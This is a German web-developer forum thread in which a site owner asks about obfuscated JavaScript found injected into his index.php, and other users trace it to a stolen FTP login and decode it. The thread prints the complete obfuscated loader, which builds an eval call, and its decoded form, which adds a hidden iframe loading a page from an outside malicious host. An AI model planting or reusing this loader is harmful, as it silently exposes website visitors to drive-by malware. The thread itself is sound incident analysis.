Plötzlich Javascript in Index-Datei auf Server aufgetaucht

Silent · 27.12.2010, 12:49

Hallo allerseits!
Ich hab folgendes Phänomen bzw. Problem:
Das Virenprogramm eines Besuchers bringt angeblich auf meiner Website eine Virusmeldung bringt. Weiß der Geier warum. Ich habe das Ganze dann mal selbst mit verschiedenen Antivirus-Programmen getestet.
- Antivir mit Updates meckert nicht.
- Kaspersky Testversion 2011 gibt eine Meldung aus die da heißt: "HEUR:Trojan-Downloader.Script.Generic" (in einem anderen Forum wurde diese Meldung als Fehler von Kaspersky ausglegt. Keine Ahnung ob was dran ist.)
- G-Data TotalCare 2011 Testversion bringt auch keine Fehlermeldung.

Dann habe ich herausgefunden, dass in der index.php plötzlich ein Javascript-Code nach dem </html> aufgetaucht ist, der da nicht hingehört und den ich selbst nicht eingebaut habe! Ich vermute stark, dass deswegen das Virenprogramm ausgeschlagen hat.
Der Sieht wie folgt aus:

Code:

<!-- ad --><script>var rerh="4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,50.5*2,55.5*2,56*2,55.5*2,61*2,52.5*2,58*2,52.5*2,59*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,54.5*2,50.5*2,54*2,54*2,23.5*2,49.5*2,58*2,53*2,55*2,49*2,58*2,52.5*2,23*2,56*2,52*2,56*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,56*2,55.5*2,57.5*2,52.5*2,58*2,52.5*2,55.5*2,55*2,29*2,48.5*2,49*2,57.5*2,55.5*2,54*2,58.5*2,58*2,50.5*2,29.5*2,54*2,50.5*2,51*2,58*2,29*2,24*2,29.5*2,58*2,55.5*2,56*2,29*2,24*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,51*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,19.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,19.5*2,20.5*2,29.5*2,51*2,23*2,57.5*2,50.5*2,58*2,32.5*2,58*2,58*2,57*2,52.5*2,49*2,58.5*2,58*2,50.5*2,20*2,19.5*2,57.5*2,57*2,49.5*2,19.5*2,22*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,50.5*2,55.5*2,56*2,55.5*2,61*2,52.5*2,58*2,52.5*2,59*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,54.5*2,50.5*2,54*2,54*2,23.5*2,49.5*2,58*2,53*2,55*2,49*2,58*2,52.5*2,23*2,56*2,52*2,56*2,19.5*2,20.5*2,29.5*2,51*2,23*2,57.5*2,58*2,60.5*2,54*2,50.5*2,23*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,30.5*2,19.5*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,19.5*2,29.5*2,51*2,23*2,57.5*2,58*2,60.5*2,54*2,50.5*2,23*2,56*2,55.5*2,57.5*2,52.5*2,58*2,52.5*2,55.5*2,55*2,30.5*2,19.5*2,48.5*2,49*2,57.5*2,55.5*2,54*2,58.5*2,58*2,50.5*2,19.5*2,29.5*2,51*2,23*2,57.5*2,58*2,60.5*2,54*2,50.5*2,23*2,54*2,50.5*2,51*2,58*2,30.5*2,19.5*2,24*2,19.5*2,29.5*2,51*2,23*2,57.5*2,58*2,60.5*2,54*2,50.5*2,23*2,58*2,55.5*2,56*2,30.5*2,19.5*2,24*2,19.5*2,29.5*2,51*2,23*2,57.5*2,50.5*2,58*2,32.5*2,58*2,58*2,57*2,52.5*2,49*2,58.5*2,58*2,50.5*2,20*2,19.5*2,59.5*2,52.5*2,50*2,58*2,52*2,19.5*2,22*2,19.5*2,24.5*2,24*2,19.5*2,20.5*2,29.5*2,51*2,23*2,57.5*2,50.5*2,58*2,32.5*2,58*2,58*2,57*2,52.5*2,49*2,58.5*2,58*2,50.5*2,20*2,19.5*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,19.5*2,22*2,19.5*2,24.5*2,24*2,19.5*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,51*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2".split(",");qg=new Date(2010,11,4);var sqls="";var pjv="e"+(parseInt(qg.getDay()))+"a"+sqls+"l";cab=(function(){return this;})();vnhe=cab[pjv.replace("6","v")];var fnp='';for(var i=0;i<rerh.length;i++){fnp+=String.fromCharCode(vnhe(rerh[i]));}
vnhe(fnp);</script><!-- /ad -->

Hat jemand ne Idee was der Code bewirken soll und wie der in mein Script kommt??

Wolla · 27.12.2010, 13:40

Da wird code zusammengebaut und ausgeführt, was auch immer der tun mag.

Lösch das raus und deaktiviere / kontrolliere alle Scripte, bei denen User Eingaben machen.

http://www.google.com/search?q=HEUR%3ATrojan-Downloader.Script.Generic

elise · 27.12.2010, 14:41

Passt darüber hinaus zu einer Angriffsserie, die spätestens seit dem Sommer läuft.. die Angreifer kommen über ftp.

Prüfe die ftp logs, generiere ein neues Passwort, überprüfe dein System.

Silent · 27.12.2010, 15:09

danke für die Antworten!
Ich hab jetzt erst mal das FTP Passwort geändert. Ist jetzt weitaus komplizierter.

Dann habe ich anhand der FTP-Logs herausgefunden, dass dieser "Angriff" am 17 und 18 Dez stattgefunden hat. Ich habe mehrere Dateien mit diesem Änderungsdatum verglichen und jedesmal war dieser Code drin.
Reicht es wenn ich den Code rauslösche?
Ich mach jetzt noch einen System-Scan mit Kaspersky.

Kann mir jemand genau sagen, was der Code bewirkt? Würde mich schon mal interessieren, was der macht...

Aber was ich nicht verstehe, wie kann jemand, der den Nutzernamen und das Passwort meines Webspace-Providers nicht kennt, darauf zugriefen??

elise · 27.12.2010, 15:47

vergiss den Hinweis von Wolla nicht.

alle Eingaben, alle Übergaben, alles, was von "außen" kommt, prüfen.

Solange du dir nicht sicher bist, wie der Code da reinkam, und du die ftp Logs nicht durchsiehst, musst du von jeder Richtung schauen.

Silent · 27.12.2010, 15:56

Zitat:

Zitat von elise

vergiss den Hinweis von Wolla nicht.

alle Eingaben, alle Übergaben, alles, was von "außen" kommt, prüfen.

Solange du dir nicht sicher bist, wie der Code da reinkam, und du die ftp Logs nicht durchsiehst, musst du von jeder Richtung schauen.

Du meinst damit Input-Felder? Ich habe nur eine Gästebuch-Seite, die mit Inputfeldern ausgestattet ist. Aber in dem Script konnte ich keinen fremden Code festellen.

Was kann ich sonst noch tun?

elise · 27.12.2010, 16:14

Dein Javascript lädt über ein iframe eine andere Seite.
Die gleiche übrigens, die ich dann über google hier fand:
http://www.trojaner-board.de/93899-u...em-server.html

Im Allgemeinen immer, auch ohne Angriff, wichtig zu lesen:
http://de.wikipedia.org/wiki/SQL-Injection
(einschließlich aller weiterführenden links)
http://www.php.net/manual/de/security.php

Erstmal mindestens htmlentities ins Gepäck nehmen, und so vieles mehr.

papalangi_44 · 31.12.2010, 01:56

Dieser Code wird dort zusammengebaut:

PHP-Code:

  qg=Sat Dec 04 2010 00:00:00 GMT+0100 (CET)

pjv=e6al

if (document.getElementsByTagName('body')[0]){ iframer();

} else { var bdy = document.createElement("body");

try { document.appendChild(bdy);

} catch (e) { document.body = bdy;

} if (document.getElementsByTagName('body')[0]){ iframer();

} else { document.write("");

} } function iframer(){ var f = document.createElement('iframe');

f.setAttribute('src','http://geopozitiv.com/mell/ctjnbti.php');

f.style.visibility='hidden';

f.style.position='absolute';

f.style.left='0';

f.style.top='0';

f.setAttribute('width','10');

f.setAttribute('height','10');

document.getElementsByTagName('body')[0].appendChild(f);

}

Das ganze solltest du schrittweise nachvollziehen.
Wie du siehst, ist am Ende der Originalsequenz ein Funktionsaufruf:, der wird erstmal auskommentiert, um das Ding etwas zu entschärfen

PHP-Code:

  //vnhe(fnp);

Dann siehst du hinten etwas Javascript

PHP-Code:

  qg=new Date(2010,11,4);var sqls="";

var pjv="e"+(parseInt(qg.getDay()))+"a"+sqls+"l";

cab=(function(){return this;})();vnhe=cab[pjv.replace("6","v")]

Wenn du das mal isoliert ausführst, kommst du sehr schnell dahinter, dass dort ein eval zusammengebastelt wird.

Das bedeutet

PHP-Code:

  fnp+=String.fromCharCode(vnhe(rerh[i]));

 
steht für 

 
fnp+=String.fromCharCode(eval(rerh[i]));

Jetzt nimmst du einen Teil des Strings und lässt dir das als Klartext ausgeben.
.split(","); erzeugt eine Tabelle, die zeichenweise zu dem String fnp
zusammengefügt wurde. wir geben das aber jetzt mit document.write aus, um den Klartext zu sehen.
document.write(x);if(x ==';' ) document.write("<br>\n");
Dieser Teil wurde von mir hinzugefügt, um das leserlich zu machen.

PHP-Code:

  var tmp = "4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2".split(",");

 
for(var i=0;i<tmp.length;i++){x=String.fromCharCode(eval(rerh[i])); 

document.write(x);if(x ==';' ) document.write("<br>\n"); 

}

So kannst du dich dann langsam vorarbeiten.
Ich würde nicht sofort alles auf einmal machen, sonder stückeweise, da du nicht weißt welche Schweinerei evtl noch im Code versteckt ist.

Was dir bzw deinem Anwender im iframe mit
geopozitiv.com/mell/ctjnbti.php untergejubel wird, kann ich nicht sagen. Ich habe darauf verzichtet mir das zu laden.

Es ist bereits spät genug.

Einen Guten Rutsch wünscht allen Papalangi_44

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Thema bewerten
Thema bewerten:

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
VisualSVN Server und PHP5	Frederic_S	Server, Hosting und Workstations	12	18.11.2010 17:50
Download einer Datei und Upload auf anderen Server	SteiniKeule	PHP Tipps 2010	2	01.11.2010 23:30
[Erledigt] csv Datei von externem Server einlesen	Rutor	PHP Tipps 2010	29	17.10.2010 20:36
[Erledigt] Datei von Server zu Server Laden	pongo0814	PHP Tipps 2010	2	06.02.2010 18:19
Datei auf ein Server senden	mbilla	PHP Tipps 2009	2	20.10.2009 12:19
Altes Script auf neuem Server - session in include Datei	phpels	PHP Tipps 2009	20	12.10.2009 02:04
Lokale Datei von Path auf Server laden	saitho	HTML, Usability und Barrierefreiheit	1	28.09.2009 14:48
Auslesen wann eine Datei auf den Server geladen wurde	picco	PHP Tipps 2009	6	22.01.2009 13:29
1101: 10x JavaScript und kein Ende ist abzusehen…	Nikolaus 2.0	Adventskalender 2008	9	13.12.2008 20:11
ZIP Datei auf Server kopieren, entpacken und Inhalt in DB		PHP-Fortgeschrittene	40	06.06.2005 23:33
javascript php datei ausführen		PHP Tipps 2005	1	02.06.2005 11:29
Datei nach Transfer löschen? (Server -> Client)		PHP Tipps 2004-2	1	14.12.2004 20:33
fehler beim öffnen einer php3 Datei auf dem Server !?		PHP Tipps 2004	5	04.11.2004 19:25
datei auf server verschieben?		PHP Tipps 2004	4	18.08.2004 16:00


Mister Ad PHP Code Flüsterer Registriert seit: 21.08.2005 Beiträge: 4682 PHP-Kenntnisse: Fortgeschritten

27.12.2010, 13:40
Wolla Moderator Registriert seit: 06.06.2008 Beiträge: 4.945 PHP-Kenntnisse: Fortgeschritten	Da wird code zusammengebaut und ausgeführt, was auch immer der tun mag. Lösch das raus und deaktiviere / kontrolliere alle Scripte, bei denen User Eingaben machen. http://www.google.com/search?q=HEUR%3ATrojan-Downloader.Script.Generic __________________ Warum denkt mein Hund eigentlich immer dann, wenn es an der Tür klingelt, es sei für ihn?

27.12.2010, 14:41
elise Erfahrener Benutzer Registriert seit: 26.12.2010 Beiträge: 175 PHP-Kenntnisse: Anfänger	Passt darüber hinaus zu einer Angriffsserie, die spätestens seit dem Sommer läuft.. die Angreifer kommen über ftp. Prüfe die ftp logs, generiere ein neues Passwort, überprüfe dein System.

27.12.2010, 15:09
Silent Benutzer Registriert seit: 21.12.2008 Beiträge: 87	danke für die Antworten! Ich hab jetzt erst mal das FTP Passwort geändert. Ist jetzt weitaus komplizierter. Dann habe ich anhand der FTP-Logs herausgefunden, dass dieser "Angriff" am 17 und 18 Dez stattgefunden hat. Ich habe mehrere Dateien mit diesem Änderungsdatum verglichen und jedesmal war dieser Code drin. Reicht es wenn ich den Code rauslösche? Ich mach jetzt noch einen System-Scan mit Kaspersky. Kann mir jemand genau sagen, was der Code bewirkt? Würde mich schon mal interessieren, was der macht... Aber was ich nicht verstehe, wie kann jemand, der den Nutzernamen und das Passwort meines Webspace-Providers nicht kennt, darauf zugriefen??

27.12.2010, 15:47
elise Erfahrener Benutzer Registriert seit: 26.12.2010 Beiträge: 175 PHP-Kenntnisse: Anfänger	vergiss den Hinweis von Wolla nicht. alle Eingaben, alle Übergaben, alles, was von "außen" kommt, prüfen. Solange du dir nicht sicher bist, wie der Code da reinkam, und du die ftp Logs nicht durchsiehst, musst du von jeder Richtung schauen.

27.12.2010, 16:14
elise Erfahrener Benutzer Registriert seit: 26.12.2010 Beiträge: 175 PHP-Kenntnisse: Anfänger	Dein Javascript lädt über ein iframe eine andere Seite. Die gleiche übrigens, die ich dann über google hier fand: http://www.trojaner-board.de/93899-u...em-server.html Im Allgemeinen immer, auch ohne Angriff, wichtig zu lesen: http://de.wikipedia.org/wiki/SQL-Injection (einschließlich aller weiterführenden links) http://www.php.net/manual/de/security.php Erstmal mindestens htmlentities ins Gepäck nehmen, und so vieles mehr.

31.12.2010, 01:56
papalangi_44 Benutzer Registriert seit: 12.02.2009 Beiträge: 63 PHP-Kenntnisse: Fortgeschritten	Klartext des scripts Dieser Code wird dort zusammengebaut: PHP-Code: qg=Sat Dec 04 2010 00:00:00 GMT+0100 (CET) pjv=e6al if (document.getElementsByTagName('body')[0]){ iframer(); } else { var bdy = document.createElement("body"); try { document.appendChild(bdy); } catch (e) { document.body = bdy; } if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(""); } } function iframer(){ var f = document.createElement('iframe'); f.setAttribute('src','http://geopozitiv.com/mell/ctjnbti.php'); f.style.visibility='hidden'; f.style.position='absolute'; f.style.left='0'; f.style.top='0'; f.setAttribute('width','10'); f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } Das ganze solltest du schrittweise nachvollziehen. Wie du siehst, ist am Ende der Originalsequenz ein Funktionsaufruf:, der wird erstmal auskommentiert, um das Ding etwas zu entschärfen PHP-Code: `//vnhe(fnp);` Dann siehst du hinten etwas Javascript PHP-Code: `qg=new Date(2010,11,4);var sqls=""; var pjv="e"+(parseInt(qg.getDay()))+"a"+sqls+"l"; cab=(function(){return this;})();vnhe=cab[pjv.replace("6","v")]` Wenn du das mal isoliert ausführst, kommst du sehr schnell dahinter, dass dort ein eval zusammengebastelt wird. Das bedeutet PHP-Code: `fnp+=String.fromCharCode(vnhe(rerh[i])); steht für fnp+=String.fromCharCode(eval(rerh[i]));` Jetzt nimmst du einen Teil des Strings und lässt dir das als Klartext ausgeben. .split(","); erzeugt eine Tabelle, die zeichenweise zu dem String fnp zusammengefügt wurde. wir geben das aber jetzt mit document.write aus, um den Klartext zu sehen. document.write(x);if(x ==';' ) document.write("<br>\n"); Dieser Teil wurde von mir hinzugefügt, um das leserlich zu machen. PHP-Code: var tmp = "4.52,4.52,52.52,512,162,202,502,55.52,49.52,58.52,54.52,50.52,552,582,232,51.52,50.52,582,34.52,542,50.52,54.52,50.52,552,582,57.52,332,60.52,422,48.52,51.52,392,48.52,54.52,50.52,202,19.52,492,55.52,502,60.52,19.52,20.52,45.52,242,46.52,20.52,61.52,6.52,4.52,4.52,4.52,52.52,512,572,48.52,54.52,50.52,572,202,20.52,29.52,6.52,4.52,4.52,62.52".split(","); for(var i=0;i<tmp.length;i++){x=String.fromCharCode(eval(rerh[i])); document.write(x);if(x ==';' ) document.write("<br>\n"); } So kannst du dich dann langsam vorarbeiten. Ich würde nicht sofort alles auf einmal machen, sonder stückeweise, da du nicht weißt welche Schweinerei evtl noch im Code versteckt ist. Was dir bzw deinem Anwender im iframe mit geopozitiv.com/mell/ctjnbti.php untergejubel wird, kann ich nicht sagen. Ich habe darauf verzichtet mir das zu laden. Es ist bereits spät genug. Einen Guten Rutsch wünscht allen Papalangi_44